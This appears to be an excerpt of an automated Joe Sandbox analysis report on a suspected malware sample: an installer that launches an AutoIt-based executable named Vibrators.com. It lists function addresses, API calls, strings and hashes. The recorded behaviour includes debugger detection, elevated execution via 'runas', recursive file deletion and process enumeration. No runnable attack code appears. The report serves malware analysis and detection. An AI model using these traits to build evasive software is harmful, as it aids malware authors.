Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Vibrators.comPID: 7852, Parent PID: 7640COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	57

Executed Functions

Function 009F5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 009F5FF7

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

GetCurrentProcess.KERNEL32(?,00A8DC2C,00000000,?,?), ref: 009F6123
IsWow64Process.KERNEL32(00000000,?,?), ref: 009F612A
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 009F6155
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 009F6167
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 009F6175
FreeLibrary.KERNEL32(00000000,?,?), ref: 009F617C
GetSystemInfo.KERNEL32(?,?,?), ref: 009F61A1

Strings

|O, xrefs: 00A350F7
kernel32.dll, xrefs: 009F6150
GetNativeSystemInfo, xrefs: 009F6161

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: d9406dfb3f4ed03526a0212f52e834a50d4a73e89fe817d3a6ea08cef865e03a
Instruction ID: 80273a83f8d2117084757638ee80111b28110d01f0fdfa932d31a2b5fe70df06
Opcode Fuzzy Hash: d9406dfb3f4ed03526a0212f52e834a50d4a73e89fe817d3a6ea08cef865e03a
Instruction Fuzzy Hash: FAA1B03291A3C4CFC712CBFC7C45BA53FA46BA6300F1A4999E580AF362C66D454ADB31

Function 009F338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,009F3368,?), ref: 009F33BB
IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,009F3368,?), ref: 009F33CE
GetFullPathNameW.KERNEL32(00007FFF,?,?,00AC2418,00AC2400,?,?,?,?,?,?,009F3368,?), ref: 009F343A

Part of subcall function 009F8577: _wcslen.LIBCMT ref: 009F858A

Part of subcall function 009F425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,009F3462,00AC2418,?,?,?,?,?,?,?,009F3368,?), ref: 009F42A0

SetCurrentDirectoryW.KERNEL32(?,00000001,00AC2418,?,?,?,?,?,?,?,009F3368,?), ref: 009F34BB
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00A33CB0
SetCurrentDirectoryW.KERNEL32(?,00AC2418,?,?,?,?,?,?,?,009F3368,?), ref: 00A33CF1
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00AB31F4,00AC2418,?,?,?,?,?,?,?,009F3368), ref: 00A33D7A
ShellExecuteW.SHELL32(00000000,?,?), ref: 00A33D81

Part of subcall function 009F34D3: GetSysColorBrush.USER32(0000000F), ref: 009F34DE
Part of subcall function 009F34D3: LoadCursorW.USER32(00000000,00007F00), ref: 009F34ED
Part of subcall function 009F34D3: LoadIconW.USER32(00000063), ref: 009F3503
Part of subcall function 009F34D3: LoadIconW.USER32(000000A4), ref: 009F3515
Part of subcall function 009F34D3: LoadIconW.USER32(000000A2), ref: 009F3527
Part of subcall function 009F34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 009F353F
Part of subcall function 009F34D3: RegisterClassExW.USER32(?), ref: 009F3590

Part of subcall function 009F35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009F35E1
Part of subcall function 009F35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 009F3602
Part of subcall function 009F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,009F3368,?), ref: 009F3616
Part of subcall function 009F35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,009F3368,?), ref: 009F361F

Part of subcall function 009F396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009F3A3C

Strings

AutoIt, xrefs: 00A33CA5
runas, xrefs: 00A33D75
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00A33CAA

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 683915450-2030392706
Opcode ID: 9c0e5582af05fa953de9f51965b62ca163fabef082815909c68e313a50465d44
Instruction ID: fd44234b7bcffe257a60667e6c0cba1f1ee67a94b506506e1ac4e305af8907b3
Opcode Fuzzy Hash: 9c0e5582af05fa953de9f51965b62ca163fabef082815909c68e313a50465d44
Instruction Fuzzy Hash: 2551F531108348ABDB05EFB0DD45FBE7BB8AFD4740F00492CF691561A2DB688A4AD762

Function 00A5DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F55D1,?,?,00A34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 009F5871

Part of subcall function 00A5EAB0: GetFileAttributesW.KERNEL32(?,00A5D840), ref: 00A5EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00A5DCCB
DeleteFileW.KERNEL32(?,?,?,?), ref: 00A5DD1B
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00A5DD2C
FindClose.KERNEL32(00000000), ref: 00A5DD43
FindClose.KERNEL32(00000000), ref: 00A5DD4C

Strings

\*.*, xrefs: 00A5DC9D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 230ba43aa1b9a49ecbfb0ce454dfd3594ae027a10a1ab7a27ce5fa56eb60919a
Instruction ID: e38502b2d9d767b12ef28a9b66850e6bbfff72dbd37dbd44dd0da42447888316
Opcode Fuzzy Hash: 230ba43aa1b9a49ecbfb0ce454dfd3594ae027a10a1ab7a27ce5fa56eb60919a
Instruction Fuzzy Hash: BD313C32009349ABC310EF64C8859AFB7E8BE95315F40495DF9E582191EB71DA0ECB63

Function 00A5DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00A5DDAC
Process32FirstW.KERNEL32(00000000,?), ref: 00A5DDBA
Process32NextW.KERNEL32(00000000,?), ref: 00A5DDDA
CloseHandle.KERNEL32(00000000), ref: 00A5DE87

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 6c4c1eadc2a893a99ffddca089685449770f401d44a9727c0a81a64a6c9393ab
Instruction ID: 2ce339628e8811fbbcbd5096d943b9b8ef4d9f18c1d8364237bbc7ff4b37b665
Opcode Fuzzy Hash: 6c4c1eadc2a893a99ffddca089685449770f401d44a9727c0a81a64a6c9393ab
Instruction Fuzzy Hash: 15315E721082059FD310EF50D885BAEBBE8BFD9354F14092DFA85861A1DB719949CB92

Function 009FEE56 Relevance: 21.6, APIs: 14, Instructions: 613windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 009FEF07
timeGetTime.WINMM ref: 009FF107
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009FF228
TranslateMessage.USER32(?), ref: 009FF27B
DispatchMessageW.USER32(?), ref: 009FF289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009FF29F
Sleep.KERNEL32(0000000A), ref: 009FF2B1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 57483fa8666684fb782e5880776ca310c68b298fdcdf294e15add00414c384b1
Instruction ID: 750c6e4eb14bd8accf896b61f903ceae42999c17c5d568b1b8a424064527f83e
Opcode Fuzzy Hash: 57483fa8666684fb782e5880776ca310c68b298fdcdf294e15add00414c384b1
Instruction Fuzzy Hash: 7332143560830AEFDB28CF24C854FBAB7E5BF85304F14492DE655872A1DB75E984CB82

Function 009F3624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 009F3657
RegisterClassExW.USER32(00000030), ref: 009F3681
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F3692
InitCommonControlsEx.COMCTL32(?), ref: 009F36AF
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F36BF
LoadIconW.USER32(000000A9), ref: 009F36D5
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F36E4

Strings

TaskbarCreated, xrefs: 009F3687
AutoIt v3 GUI, xrefs: 009F3673
+, xrefs: 009F3640
0, xrefs: 009F3639

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 4b32c4ae4d502dd523c571fc6435ce35dff684a52110a5893b9549f5da74a722
Instruction ID: 7f4daf8432e9b37f57b41cb82d02c8996865d680cb40ebc132c882833502d8da
Opcode Fuzzy Hash: 4b32c4ae4d502dd523c571fc6435ce35dff684a52110a5893b9549f5da74a722
Instruction Fuzzy Hash: 1921C0B1D01358AFDB10EFE4EC89B9DBBB4FB08710F11411AF611A62A0D7B545468F91

Function 00A309DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A3071A: CreateFileW.KERNEL32(00000000,00000000,?,00A30A84,?,?,00000000,?,00A30A84,00000000,0000000C), ref: 00A30737

GetLastError.KERNEL32 ref: 00A30AEF
__dosmaperr.LIBCMT ref: 00A30AF6
GetFileType.KERNEL32(00000000), ref: 00A30B02
GetLastError.KERNEL32 ref: 00A30B0C
__dosmaperr.LIBCMT ref: 00A30B15
CloseHandle.KERNEL32(00000000), ref: 00A30B35
CloseHandle.KERNEL32(?), ref: 00A30C7F
GetLastError.KERNEL32 ref: 00A30CB1
__dosmaperr.LIBCMT ref: 00A30CB8

Strings

H, xrefs: 00A30C3D

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 8fa3b4aeb1c21aae38b074f97bf0e44a0b0d8d4054f12f7ec1b1bca121cdd553
Instruction ID: 83aee13371353b76aaccdbaee9aa015ded4a6548cfeccdc4d4eb62e25c0e3b2e
Opcode Fuzzy Hash: 8fa3b4aeb1c21aae38b074f97bf0e44a0b0d8d4054f12f7ec1b1bca121cdd553
Instruction Fuzzy Hash: 6DA1F332A141489FDF19EFB8E862FAE7BA1EB06324F14015AF811DB2D2D7359D12CB51

Function 009F52A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009F5594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A34B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 009F55B2

Part of subcall function 009F5238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009F525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009F53C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A34BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A34C3E
RegCloseKey.ADVAPI32(?), ref: 00A34C80
_wcslen.LIBCMT ref: 00A34CE7
_wcslen.LIBCMT ref: 00A34CF6

Strings

Software\AutoIt v3\AutoIt, xrefs: 009F53BA
\Include\, xrefs: 009F5381
Include, xrefs: 00A34BF4, 00A34C35
\, xrefs: 00A34CFC

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 493c8468f86cd01dca12e834233859863bc980080401f4ad7ab481b13778fa3e
Instruction ID: 6dcffd387e307f02a569c6a0677e674b954fc335b91befe6ac7353591909bf28
Opcode Fuzzy Hash: 493c8468f86cd01dca12e834233859863bc980080401f4ad7ab481b13778fa3e
Instruction Fuzzy Hash: D4719072104305AFCB04EFA5E941DABBBF8FF98340F41452DF5518B2A0DB719A46CB52

Function 009F34D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 009F34DE
LoadCursorW.USER32(00000000,00007F00), ref: 009F34ED
LoadIconW.USER32(00000063), ref: 009F3503
LoadIconW.USER32(000000A4), ref: 009F3515
LoadIconW.USER32(000000A2), ref: 009F3527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 009F353F
RegisterClassExW.USER32(?), ref: 009F3590

Part of subcall function 009F3624: GetSysColorBrush.USER32(0000000F), ref: 009F3657
Part of subcall function 009F3624: RegisterClassExW.USER32(00000030), ref: 009F3681
Part of subcall function 009F3624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F3692
Part of subcall function 009F3624: InitCommonControlsEx.COMCTL32(?), ref: 009F36AF
Part of subcall function 009F3624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F36BF
Part of subcall function 009F3624: LoadIconW.USER32(000000A9), ref: 009F36D5
Part of subcall function 009F3624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F36E4

Strings

#, xrefs: 009F3566
0, xrefs: 009F355F
AutoIt v3, xrefs: 009F357F

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 18972106c99fb80768bf127dca40862355607015cd803584e2bee86c85466fe7
Instruction ID: 0044f375ead6ad897de66d31a4e8b76d8354fbc77973e012a691fcfc0f67731e
Opcode Fuzzy Hash: 18972106c99fb80768bf127dca40862355607015cd803584e2bee86c85466fe7
Instruction Fuzzy Hash: EE212F70D00398ABDB10DFE5EC59FA9BFB4FB48750F01402AEA14AA3A0D7B94546CF90

Function 00A70FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00A71019
inet_addr.WSOCK32(?), ref: 00A71079
gethostbyname.WS2_32(?), ref: 00A71085
IcmpCreateFile.IPHLPAPI ref: 00A71093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A71123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A71142
IcmpCloseHandle.IPHLPAPI(?), ref: 00A71216
WSACleanup.WSOCK32 ref: 00A7121C

Strings

Ping, xrefs: 00A710D3

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
